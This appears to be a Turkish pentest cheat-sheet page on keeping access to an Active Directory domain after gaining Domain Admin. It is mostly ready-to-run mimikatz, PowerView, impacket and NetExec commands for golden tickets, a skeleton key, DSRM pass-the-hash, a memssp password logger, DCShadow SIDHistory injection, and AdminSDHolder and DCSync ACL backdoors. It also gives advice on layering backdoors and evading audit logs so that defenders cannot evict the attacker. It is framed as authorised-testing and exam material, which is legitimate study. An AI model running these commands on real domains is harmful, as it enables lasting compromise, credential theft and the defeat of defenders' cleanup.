FOOTHOLD Metodoloji Cheat-sheet
Post ⚠ RESTRICTED zor :88:389:445

Domain Persistence — Golden Ticket, DSRM, Skeleton Key, Custom SSP, DCShadow, AdminSDHolder, ACL Backdoor

Domain Admin/DCSync hakları elde edildikten sonra erişimi kalıcılaştırmak için krbtgt golden ticket, DSRM backdoor, skeleton key, custom SSP, DCShadow, AdminSDHolder ve DCSync ACL backdoor teknikleri uygulanır.

Bilgi: ÖN KOŞULLAR
  • Domain Admin veya eşdeğer (DCSync/DA) yetkisi
  • DC üzerinde kod çalıştırma (skeleton key, DSRM, custom SSP için)
  • krbtgt hash'i (golden ticket için)
  • DOMAIN_SID
┌──

Komutlar

mimikatz ✓ EXAM-SAFE domain-admin
lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt
Golden ticket kalıcılığı için krbtgt anahtarını çek; sonra istenildiğinde TGT üretilir. HackTricks - Domain Persistence (Golden)
mimikatz ⚠ RESTRICTED domain-admin
privilege::debug; misc::skeleton
Skeleton Key: DC LSASS'ine yama atar; her hesap kendi parolasının yanında 'mimikatz' master parolasıyla da giriş yapar. Sadece bellektedir, reboot'ta kaybolur. HackTricks - Skeleton Key
mimikatz ✓ EXAM-SAFE domain-admin
lsadump::lsa /inject /name:krbtgt
DSRM/Directory Services parolasını veya hesapları sızdırarak alternatif backdoor anahtar elde etme. HackTricks - DSRM persistence
mimikatz ✓ EXAM-SAFE domain-admin
token::elevate; lsadump::sam
DSRM (local Administrator) hash'ini çek; DsrmAdminLogonBehavior=2 registry ile bu hash ile DC'ye pass-the-hash yapılır. The Hacker Recipes - DSRM persistence
powershell ✓ EXAM-SAFE domain-admin
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD -Force
DSRM hesabının ağ üzerinden (network) logon yapabilmesi için registry anahtarını ayarlar — DSRM PtH backdoor'unu etkinleştirir. HackTricks - DSRM DsrmAdminLogonBehavior
mimikatz ⚠ RESTRICTED domain-admin
misc::memssp
Custom SSP: mimilib/memssp ile DC'ye SSP yüklenir; tüm interaktif login parolaları C:\Windows\System32\mimilsa.log dosyasına cleartext yazılır. HackTricks - Custom SSP persistence
mimikatz ⚠ RESTRICTED domain-admin
lsadump::dcshadow /object:CN=target,CN=Users,DC=corp,DC=local /attribute:SIDHistory /value:S-1-5-21-...-519
DCShadow: geçici sahte bir DC kaydederek replikasyonla AD'ye değişiklik (ör. SIDHistory enjeksiyonu) yazar; normal değişiklik loglarını atlatır. İkinci mimikatz oturumu DA token ile push eder. The Hacker Recipes - DCShadow
powerview ✓ EXAM-SAFE domain-admin
Add-DomainObjectAcl -TargetIdentity "DC={{DOMAIN}}" -PrincipalIdentity {{USER}} -Rights DCSync
ACL Backdoor: düşük yetkili bir kullanıcıya domain root üzerinde DCSync (Replicating Directory Changes) hakkı verir; ileride o hesapla tüm hash'ler çekilir. HackTricks - ACL Persistence (DCSync backdoor)
powerview ✓ EXAM-SAFE domain-admin
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC={{DOMAIN}}' -PrincipalIdentity {{USER}} -Rights All
AdminSDHolder Backdoor: korumalı gruplara (Domain Admins vb.) SDProp ile her 60 dk'da bir geri yazılan kalıcı Full Control ACL ekler. HackTricks - AdminSDHolder persistence
netexec ✓ EXAM-SAFE user
nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M ntdsutil
ACL/DCSync backdoor sonrası düşük yetkili hesapla NTDS dump testi (doğrulama). NetExec Wiki - ntds / module
impacket ✓ EXAM-SAFE user
impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}
DCSync ACL backdoor'lu hesapla domain hash'lerini çekerek backdoor'u kanıtla. WADComs - secretsdump DCSync

Genel Bakış

Domain Admin elde etmek başlangıçtır; asıl hedef erişimi kaybetmemek. Bu sayfa, savunmacı parola sıfırlasa/temizlik yapsa bile geri dönmeyi sağlayan domain dominance kalıcılık tekniklerini kapsar. UYARI: Bu teknikler gürültülü ve geri dönüşü zordur; OSCP sınavında otomasyon/Metasploit gerektiren kısımlar restricted sayılır, yalnızca yazılı yetkili ortamda kullan.

1. Golden Ticket (en dayanıklı)

krbtgt hash’i bir kez çekildiğinde (dcsync /user:krbtgt) offline olarak istediğin zaman Administrator TGT üretebilirsin. Savunmacı krbtgt parolasını iki kez sıfırlamazsa backdoor yaşar. Detay için bkz. ad-tickets.

2. DSRM Backdoor

Her DC’de Directory Services Restore Mode için bir local Administrator hesabı vardır. Hash’ini lsadump::sam ile çekip, DsrmAdminLogonBehavior=2 registry değeriyle ağ üzerinden pass-the-hash girişine açarsın. DA parolaları değişse bile bu hesap kalır.

3. Skeleton Key

misc::skeleton LSASS’i bellekte yamalar; artık her domain hesabı kendi parolası VEYA mimikatz master parolası ile giriş yapar. Sadece RAM’dedir — DC reboot edilince gider, bu yüzden geçici tutunma için idealdir. EDR/LSA Protection (RunAsPPL) bunu engeller.

4. Custom SSP (memssp)

misc::memssp ile LSA’ya sahte bir Security Support Provider yüklenir; tüm interaktif oturum parolaları cleartext olarak mimilsa.log’a düşer. Sürekli credential hasadı sağlar.

5. DCShadow

Geçici, sahte bir DC kaydedip (DRSUAPI replikasyonu) doğrudan dizine yazma yaparsın. Normal LDAP/değişiklik denetim loglarını atlar. Tipik kullanım: kurbana SIDHistory ekleyip onu Domain Admin yapmak ya da primaryGroupID değiştirmek. İki mimikatz oturumu gerekir (biri push, biri DA token).

6. AdminSDHolder

AdminSDHolder nesnesinin ACL’i, SDProp süreci ile her ~60 dakikada bir korumalı gruplara (Domain Admins, Enterprise Admins…) zorla kopyalanır. Buraya kullanıcına Full Control eklersen, savunmacı grup ACL’ini temizlese bile SDProp senin ACE’ini geri yazar.

7. ACL / DCSync Backdoor

Domain root nesnesine Add-DomainObjectAcl ... -Rights DCSync ile düşük profilli bir kullanıcıya Replicating Directory Changes (All) hakkı verirsin. Bu kullanıcı görünürde sıradan biridir ama istediğinde secretsdump -just-dc ile tüm hash’leri çeker.

Sıralı Mantık

  1. DA/DCSync yetkisini doğrula.
  2. En az iki bağımsız backdoor kur (ör. Golden için krbtgt + ACL DCSync) — biri kapanırsa diğeri kalsın.
  3. Her birini düşük yetkili bir hesapla test et (nxc/secretsdump).
  4. Temizlik planını not al (yazılı pentest gereği).

Gotchas

  • RunAsPPL / Credential Guard: skeleton key ve memssp’yi engeller.
  • krbtgt double-reset: golden ticket’ı tek sıfırlama öldürmez, iki sıfırlama öldürür.
  • DCShadow için makinenin DC olarak SPN kaydı ve DA token gerekir; ağ erişimi sınırlıysa başarısız olur.
  • AdminSDHolder gecikme: ACE’in etkisi SDProp döngüsünü (varsayılan 60 dk) bekler.

Sonuç

Katmanlı kalıcılık ile savunmacının tek bir temizlik adımıyla seni atması engellenir; her teknik farklı bir tespit/temizlik yüzeyine dokunur.

┌──

Kaynaklar

↗ HackTricks - AD Persistence↗ The Hacker Recipes - Persistence (DSRM/DCShadow/SSP)↗ HackTricks - ACLs/ACEs Abuse (AdminSDHolder/DCSync backdoor)↗ GhostPack/ADModule + PowerView Add-DomainObjectAcl
0/15 set